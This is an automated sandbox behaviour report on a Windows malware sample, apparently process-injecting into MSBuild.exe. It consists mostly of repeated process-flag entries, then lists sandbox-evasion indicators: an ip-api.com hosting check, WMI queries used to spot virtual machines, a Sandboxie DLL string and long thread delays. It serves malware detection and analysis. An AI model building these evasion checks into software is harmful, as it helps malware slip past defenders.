                  Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 35358
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51439
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Check if machine is in data center or colocation facility
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: MSBuild.exe, 00000002.00000002.3008889130.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeMemory allocated: 1CD87C50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeMemory allocated: 1CDA1660000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeWindow / User API: threadDelayed 4337Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeWindow / User API: threadDelayed 1203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3884Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 418Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -99765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -99653s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -99546s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -99437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -99328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -99218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -99062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -98948s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -98830s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -98703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -98562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -98372s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -98250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -98093s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -97967s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -97858s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe TID: 7516Thread sleep time: -97749s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5592Thread sleep count: 3884 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -99764s >= -30000sJump to behavior
